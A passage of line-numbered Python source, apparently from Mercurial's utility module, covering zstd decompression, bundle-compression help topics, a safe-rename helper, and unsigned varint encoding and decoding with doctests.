3583 3664 chunks.append(chunk)
3584 3665 pos = pos2
3585 3666 chunks.append(z.flush())
3586 3667
3587 3668 if sum(map(len, chunks)) < insize:
3588 3669 return ''.join(chunks)
3589 3670 return None
3590 3671
3591 3672 def decompress(self, data):
3592 3673 insize = len(data)
3593 3674
3594 3675 try:
3595 3676 # This was measured to be faster than other streaming
3596 3677 # decompressors.
3597 3678 dobj = self._dctx.decompressobj()
3598 3679 chunks = []
3599 3680 pos = 0
3600 3681 while pos < insize:
3601 3682 pos2 = pos + self._decompinsize
3602 3683 chunk = dobj.decompress(data[pos:pos2])
3603 3684 if chunk:
3604 3685 chunks.append(chunk)
3605 3686 pos = pos2
3606 3687 # Frame should be exhausted, so no finish() API.
3607 3688
3608 3689 return ''.join(chunks)
3609 3690 except Exception as e:
3610 3691 raise error.RevlogError(_('revlog decompress error: %s') %
3611 3692 stringutil.forcebytestr(e))
3612 3693
3613 3694 def revlogcompressor(self, opts=None):
3614 3695 opts = opts or {}
3615 3696 return self.zstdrevlogcompressor(self._module,
3616 3697 level=opts.get('level', 3))
3617 3698
3618 3699 compengines.register(_zstdengine())
3619 3700
3620 3701 def bundlecompressiontopics():
3621 3702 """Obtains a list of available bundle compressions for use in help."""
3622 3703 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3623 3704 items = {}
3624 3705
3625 3706 # We need to format the docstring. So use a dummy object/type to hold it
3626 3707 # rather than mutating the original.
3627 3708 class docobject(object):
3628 3709 pass
3629 3710
3630 3711 for name in compengines:
3631 3712 engine = compengines[name]
3632 3713
3633 3714 if not engine.available():
3634 3715 continue
3635 3716
3636 3717 bt = engine.bundletype()
3637 3718 if not bt or not bt[0]:
3638 3719 continue
3639 3720
3640 3721 doc = pycompat.sysstr('``%s``\n %s') % (
3641 3722 bt[0], engine.bundletype.__doc__)
3642 3723
3643 3724 value = docobject()
3644 3725 value.__doc__ = doc
3645 3726 value._origdoc = engine.bundletype.__doc__
3646 3727 value._origfunc = engine.bundletype
3647 3728
3648 3729 items[bt[0]] = value
3649 3730
3650 3731 return items
3651 3732
3652 3733 i18nfunctions = bundlecompressiontopics().values()
3653 3734
3654 3735 # convenient shortcut
3655 3736 dst = debugstacktrace
3656 3737
3657 3738 def safename(f, tag, ctx, others=None):
3658 3739 """
3659 3740 Generate a name that it is safe to rename f to in the given context.
3660 3741
3661 3742 f: filename to rename
3662 3743 tag: a string tag that will be included in the new name
3663 3744 ctx: a context, in which the new name must not exist
3664 3745 others: a set of other filenames that the new name must not be in
3665 3746
3666 3747 Returns a file name of the form oldname~tag[~number] which does not exist
3667 3748 in the provided context and is not in the set of other names.
3668 3749 """
3669 3750 if others is None:
3670 3751 others = set()
3671 3752
3672 3753 fn = '%s~%s' % (f, tag)
3673 3754 if fn not in ctx and fn not in others:
3674 3755 return fn
3675 3756 for n in itertools.count(1):
3676 3757 fn = '%s~%s~%s' % (f, tag, n)
3677 3758 if fn not in ctx and fn not in others:
3678 3759 return fn
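# For example (sketch): safename(b'foo', b'resolve', ctx) yields
# b'foo~resolve', or b'foo~resolve~1', b'foo~resolve~2', ... if earlier
# candidates already exist in ctx or others.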
3679 3760
3680 3761 def readexactly(stream, n):
3681 3762 '''read n bytes from stream.read and abort if less was available'''
3682 3763 s = stream.read(n)
3683 3764 if len(s) < n:
3684 3765 raise error.Abort(_("stream ended unexpectedly"
3685 3766 " (got %d bytes, expected %d)")
3686 3767 % (len(s), n))
3687 3768 return s
3688 3769
3689 3770 def uvarintencode(value):
3690 3771 """Encode an unsigned integer value to a varint.
3691 3772
3692 3773 A varint is a variable length integer of 1 or more bytes. Each byte
3693 3774 except the last has the most significant bit set. The lower 7 bits of
3694 3775 each byte store the unsigned binary value, least significant group
3695 3776 first.
3696 3777
3697 3778 >>> uvarintencode(0)
3698 3779 '\\x00'
3699 3780 >>> uvarintencode(1)
3700 3781 '\\x01'
3701 3782 >>> uvarintencode(127)
3702 3783 '\\x7f'
3703 3784 >>> uvarintencode(1337)
3704 3785 '\\xb9\\n'
3705 3786 >>> uvarintencode(65536)
3706 3787 '\\x80\\x80\\x04'
3707 3788 >>> uvarintencode(-1)
3708 3789 Traceback (most recent call last):
3709 3790 ...
3710 3791 ProgrammingError: negative value for uvarint: -1
3711 3792 """
3712 3793 if value < 0:
3713 3794 raise error.ProgrammingError('negative value for uvarint: %d'
3714 3795 % value)
3715 3796 bits = value & 0x7f
3716 3797 value >>= 7
3717 3798 bytes = []
3718 3799 while value:
3719 3800 bytes.append(pycompat.bytechr(0x80 | bits))
3720 3801 bits = value & 0x7f
3721 3802 value >>= 7
3722 3803 bytes.append(pycompat.bytechr(bits))
3723 3804
3724 3805 return ''.join(bytes)
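# Worked example for the b'\xb9\n' doctest above: 1337 is 0b101_0011_1001;
# the low 7 bits (0b0111001 = 0x39) plus the continuation bit give 0xb9,
# and the remaining bits (0b1010 = 0x0a) encode as '\n'.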
3725 3806
3726 3807 def uvarintdecodestream(fh):
3727 3808 """Decode an unsigned variable length integer from a stream.
3728 3809
3729 3810 The passed argument is anything that has a ``.read(N)`` method.
3730 3811
3731 3812 >>> try:
3732 3813 ... from StringIO import StringIO as BytesIO
3733 3814 ... except ImportError:
3734 3815 ... from io import BytesIO
3735 3816 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3736 3817 0
3737 3818 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3738 3819 1
3739 3820 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3740 3821 127
3741 3822 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3742 3823 1337
3743 3824 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3744 3825 65536
3745 3826 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3746 3827 Traceback (most recent call last):
3747 3828 ...
3748 3829 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3749 3830 """
3750 3831 result = 0
3751 3832 shift = 0
3752 3833 while True:
3753 3834 byte = ord(readexactly(fh, 1))
3754 3835 result |= ((byte & 0x7f) << shift)
3755 3836 if not (byte & 0x80):
3756 3837 return result
3757 3838 shift += 7